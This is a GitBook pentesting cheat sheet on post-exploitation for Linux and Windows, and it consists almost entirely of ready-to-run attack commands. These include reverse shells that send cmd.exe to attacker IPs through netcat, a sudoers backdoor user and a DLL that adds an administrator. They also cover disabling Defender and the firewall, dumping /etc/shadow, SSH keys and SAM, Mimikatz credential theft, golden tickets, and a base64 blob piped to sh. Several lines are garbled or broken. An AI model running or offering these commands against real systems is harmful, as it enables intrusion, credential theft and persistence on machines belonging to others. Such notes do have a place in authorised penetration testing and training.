Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Post eploitation

Local Enum **Tools** https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh https://github.com/mbahadou/postenum/blob/master/postenum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32 https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 https://gtfobins.github.io/ # Spawning shell python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') /bin/sh -i perl -e 'exec "/bin/sh";' ruby: exec "/bin/sh" lua: os.execute('/bin/sh') (From within vi) :!bash :set shell=/bin/bash:shell (From within nmap) !sh # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Download files from attacker wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64 # Enum scripts ./LinEnum.sh -t -k password -r LinEnum.txt ./postenum.sh ./linpeas.sh ./pspy # Common writable directories /tmp /var/tmp /dev/shm # Add user to sudoers useradd hacker passwd hacker echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers # sudo permissions sudo -l -l # Journalctl If you can run as root, run in small window and !/bin/sh # Crons crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root cat /etc/frontal cat /etc/anacron systemctl list-timers --all # Common info uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Network info cat /proc/net/arp cat /proc/net/fib_trie cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127." awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) { ret = ret"."hextodec(substr(str,i,2)) } ret = ret":"hextodec(substr(str,index(str,":")+1,4)) return ret } NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp # Netstat without netstat 2 echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh # Nmap without nmap for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done # Open ports without netstat grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' # Check ssh files: cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key # SUID find / -perm -4000 -type f 2>/dev/null # ALL PERMS find / -perm -777 -type f 2>/dev/null # SUID for current user find / perm /u=s -user `whoami` 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null # Writables for current user/group find / perm /u=w -user `whoami` 2>/dev/null find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null find / -perm /u+w -user `whoami` 2>/dev/nul # Dirs with +w perms for current u/g find / perm /u=w -type -d -user `whoami` 2>/dev/null find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null # Port Forwarding # Chisel # Victim server: chisel server --auth "test:123" -p 443 --reverse # In host attacker machine: ./chisel client --auth "test:123" 10.10.10.10:443 R:socks # Dynamic Port Forwarding: # Attacker machine: ssh -D 9050 user@host # Attacker machine Burp Proxy - SOCKS Proxy: Mark “Override User Options” Mark Use Socks Proxy: SOCKS host:127.0.0.1 SOCKS port:9050 # Tunneling Target must have SSH running for there service 1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 3. Add the following line into the config: Socks5 127.0.0.1 4. Run commands through the tunnel: proxychains # SShuttle # https://github.com/sshuttle/sshuttle sshuttle -r root@172.21.0.0 10.2.2.0/24 # netsh port forwarding netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 Escaping restricted shell # First check your shell echo $SHELL # and commands export # vim # List files :!/bin/ls -l .b* # Set new shell :set shell=/bin/sh :shell # or :!/bin/sh # ed !'/bin/sh' # ne -> Load Prefs -> Navigate everywhere # more/less/man/pinfo !'sh' # links -> File OS Shell # lynx -> "o" for options -> configure default editor e.g. vim lynx --editor=/usr/bin/vim www.google.com # or export EDITOR=/usr/bin/vim # navigate to https://translate.google.com/ go to text box, ENTER and F4 # mutt ! # find find / -name "root" -exec /bin/sh \; find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # nmap < 2009/05 --interactive !sh # awk awk 'BEGIN {system("/bin/sh")}' # expect expect -c 'spawn sh' -i # python python -c 'import pty; pty.spawn("/bin/sh")' # ruby irb exec '/bin/sh' # perl perl -e 'system("sh -i");' perl -e 'exec("sh -i");' # php -a exec("sh -i"); # Only Rbash echo x | xargs -Iy sh -c 'exec sh 0<&1' # Emacs Mod-! /bin/sh # cp cp /bin/sh /dev/shm/sh; /dev/shm/sh # export export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH # FTP/Telnet !/bin/sh # GDB !/bin/sh # eval eval echo echo {o..q}ython\; # tee echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc' # declare declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i # nano nano -s /bin/sh # Ctrl+T # SSH ssh user@host -t "bash --noprofile -i" ssh user@host -t "() { :; }; sh -i " Loot # Linux cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ifconfig -a arp -a tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111 tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111 .bash_history /var/mail /var/spool/mail echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION Windows Local enum # Tools https://github.com/S3cur3Th1sSh1t/WinPwn https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/PowerUp.ps1 https://github.com/S3cur3Th1sSh1t/PowerSharpPack https://github.com/Flangvik/SharpCollection https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/dafthack/DomainPasswordSpray https://github.com/CredDefense/CredDefense https://github.com/dafthack/MailSniper https://github.com/itm4n/PrivescCheck https://lolbas-project.github.io/# # Basic info systeminfo set Get-ChildItem Env: | ft Key,Value hostname net users net user user1 query user Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name net use wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root net localgroups accesschk.exe -uwcqv "Authenticated Users" * netsh firewall show state netsh firewall show config whoami /priv echo %USERNAME% $env:UserName wmic qfe qwinsta query user net localgroup Get-LocalGroup | ft Name # Set path set PATH=%PATH%;C:\xampp\php dir /a -> Show hidden & unhidden files dir /Q -> Show permissions # check .net version: gci 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | gp -name Version -EA 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Users Path" # Passwords # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # SNMP Parameters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s python secretsdump.py -just-dc-ntlm htb.hostname/username@10.10.1.10 secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt # Add RDP user and disable firewall net user test Test123! /add net localgroup Administrators test /add net localgroup "Remote Desktop Users" test /ADD # Turn firewall off and enable RDP sc stop WinDefend netsh advfirewall show allprofiles netsh advfirewall set allprofiles state off netsh firewall set opmode disable reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f # Dump Firefox data # Looking for Firefox Get-Process ./procdump64.exe -ma $PID-FF Select-String -Path .\*.dmp -Pattern 'password' > 1.txt type 1.txt | findstr /s /i "admin" # PS Bypass Policy Set-ExecutionPolicy Unrestricted powershell.exe -exec bypass Set-ExecutionPolicy-ExecutionPolicyBypass -Scope Procesy # Convert passwords to secure strings and output to an XML file: $secpasswd = ConvertTo-SecureString "VMware1!" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd) $mycreds | export-clixml -path c:\temp\password.xml # PS sudo $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat" Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' powershell -ExecutionPolicy -F -File xyz.ps1 # PS runas # START PROCESS $username='someUser' $password='somePassword' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential # INVOKE COMMAND $pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential ("fidelity\hector", $pass);Invoke-Command -Computer 'Fidelity' -ScriptBlock {C:\inetpub\wwwroot\uploads\nc.exe -e cmd 10.10.15.121 443} -credential $Credential # Tasks schtasks /query /fo LIST /v file c:\WINDOWS\SchedLgU.Txt python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo # Useradd bin #include /* system, NULL, EXIT_FAILURE */ int main () { int i; i=system ("net user /add && net localgroup administrators /add"); return 0; } # Compile i686-w64-mingw32-gcc -o useradd.exe useradd.c # WinXP sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc qc upnphost sc config upnphost depend= "" net start upnphost # WinRM Port Forwarding plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221 # DLL Injection #include int owned() { WinExec("cmd.exe /c net user username Password01 ; net localgroup administrators username /add", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { owned(); return 0; } # x64 compilation: x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a # Generate Silver Tickets with Impacket: python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> # Generate Golden Tickets: python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name> python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name> # Credential Access with Secretsdump impacket-secretsdump username@target-ip -dc-ip target-ip # Disable Assembly code generator https://amsi.fail/ Interesting files C:\windows\repair\sam C:\windows\System32\config\RegBack\SAM C:\windows\repair\system C:\windows\repair\software C:\windows\repair\security C:\windows\debug\NetSetup.log C:\windows\iis5.log C:\windows\iis6.log C:\windows\iis7.log C:\windows\system32\logfiles\httperr\httperr1.log C:\sysprep.inf C:\sysprep\sysprep.inf C:\sysprep\sysprep.xml C:\windows\Panther\Unattended.xml C:\inetpub\wwwroot\Web.config C:\windows\system32\config\AppEvent.Evt C:\windows\system32\config\SecEvent.Evt C:\windows\system32\config\default.sav C:\windows\system32\config\security.sav C:\windows\system32\config\software.sav C:\windows\system32\config\system.sav C:\windows\system32\inetsrv\config\applicationHost.config C:\windows\system32\inetsrv\config\schema\ASPNET_schema.xml C:\windows\System32\drivers\etc\hosts C:\windows\System32\drivers\etc\networks C:\windows\system32\config\SAM Mimikatz # SAM privilege::debug token::elevate lsadump::sam # Windows Credential Manager privilege::debug sekurlsa::credman # LSASS privilege::debug sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP sekurlsa::logonpasswords #or privilege::debug lsadump::lsa /patch # WDigest privilege::debug sekurlsa::wdigest Privilege Escalation # Check groups and privs whoami /priv # Interesting accounts - Administrators, Local System - Built-in groups (Backup, Server, Printer Operators) - Local/network service accounts - Managed Service and Virtual Accounts - Third party application users - Misconfigured users # Interesting privileges - SeDebugPrivilege Create a new process and set the parent process a privileged process https://github.com/decoder-it/psgetsystem - SeRestorePrivilege Can write files anywhere, overwrites files, protected system files Modify a service running as Local and startable by all users and get a SYSTEM shell - SeBackupPrivilege Can backup Windows registry and use third party tools for extracting local NTLM hashes Members of “Backup Operators” can logon locally on a Domain Controller and backup the NTDS.DIT - SeTakeOwnershipPrivilege Can take ownership of any securable object in the system - SeTcbPrivilege Can logon as a different user without any credentials in order to get a security Impersonation Token by using the LsaLogonUser() function - SeCreateTokenPrivilege Can create a custom token with all privileges and group membership you need (until Win 10 >= 1809) But if you set the AuthenticationId to ANONYMOUS_LOGON_UID (0x3e6) you can always impersonate even in Win >=1809 and use a subset of API calls: CreateFile(), RegSetKey() - SeLoadDriver Privilege "Printer operators" have this privilege in the DC Determines which users can dynamically load and unload device drivers or other code in to kernel mode - SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege Permit impersonate any access token ** If you have SeBackup & SeRestore privileges (Backup Operators group) you can set permission and ownership on each file & folder ** Loot hostname && whoami.exe && ipconfig /all wce32.exe -w wce64.exe -w fgdump.exe # Loot passwords without tools reg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system ipconfig /all route print # What other machines have been connected arp -a # Meterpreter run packetrecorder -li run packetrecorder -i 1 #Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql hashdump keysscan_start keyscan_dump keyscan_stop webcam_snap load mimikatz msv # How to cat files in meterpreter cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt # Recursive search dir /s secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt .\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit" # Mimikatz # Post exploitation commands must be executed from SYSTEM level privileges. mimikatz # privilege::debug mimikatz # token::whoami mimikatz # token::elevate mimikatz # lsadump::sam mimikatz # sekurlsa::logonpasswords ## Pass The Hash mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash # Inject generated TGS key mimikatz # kerberos::ptt <ticket_kirbi_file> # Generating a silver ticket # AES 256 Key: mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # AES 128 Key: mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # NTLM mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # Generating a Golden Ticket # AES 256 Key: mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> # AES 128 Key: mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> # NTLM: mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name> # Lsassy (remote lsass/mimikatz dump reader) (requires impacket) git clone https://github.com/hackndo/lsassy cd lsassy && sudo python3 setup.py install lsassy example.com/Administrator:s3cr3tpassw0rd@victim-pc # Lsass dump https://github.com/outflanknl/Dumpert

PreviousLinux Pivoting

Last updated 1 year ago

Page cover image